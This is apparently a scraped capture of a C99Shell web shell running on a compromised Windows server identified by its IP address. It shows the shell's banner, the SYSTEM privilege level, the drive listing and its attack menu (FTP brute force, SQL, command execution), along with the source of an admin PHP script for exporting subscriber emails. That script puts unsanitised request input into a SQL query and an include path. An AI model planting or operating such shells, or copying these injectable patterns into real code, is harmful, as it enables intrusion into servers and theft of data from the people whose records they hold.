190.27.245.106 - c99shell

!C99Shell v. 1.0 pre-release build #13!
Software: Apache. PHP/5.5.15 uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 SYSTEM Safe-mode: OFF (not secure) C:\AmbienteBogota\boletinprensa\admin\ drwxrwxrwx Free 4.09 GB of 39.52 GB (10.35%) Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ] Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!C99Shell v. 1.0 pre-release build #13!

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586

SYSTEM

Safe-mode: OFF (not secure)

C:\AmbienteBogota\boletinprensa\admin\ drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?

include("../include/config.php");

include("../include/db/db_".$db_type.".inc.php");



function export_subscribers($hostname,$login ,$pass,$database, $table_email, $list_id)

{

  $db= new Db();

  $db->DbConnect($hostname, $login, $pass, $database);

  $db->DbQuery("SELECT email FROM $table_email WHERE list_id='$list_id'");

  echo $db->DbError();

  

  header("Content-disposition: filename=listing.txt");

  header("Content-type: application/octetstream");

  header("Pragma: no-cache");

  header("Expires: 0");

  

  $client = getenv("HTTP_USER_AGENT");

  if (eregi("Win",$client))

   // this looks better under WinX

   $crlf="\r\n";

  else $crlf="\n";

  

  for($i=0; $i< $db->DbNumRows(); $i++){

      $line = $db->DbNextRow();

      print $line[0]; 

      if($i< ($db->DbNumRows() -1))

    print  $crlf;

      

  }

  exit();

}



$db_type = $_POST['db_type'];

$db_host = $_POST['db_host'];

$db_name = $_POST['db_name'];

$db_login = $_POST['db_login'];

$db_pass = $_POST['db_pass'];

$table_email = $_POST['table_email'];

$list_id = $_POST['list_id'];



export_subscribers($db_host, $db_login, $db_pass, $db_name, $table_email, $list_id);

?>

:: Command execute ::
Enter:	Select: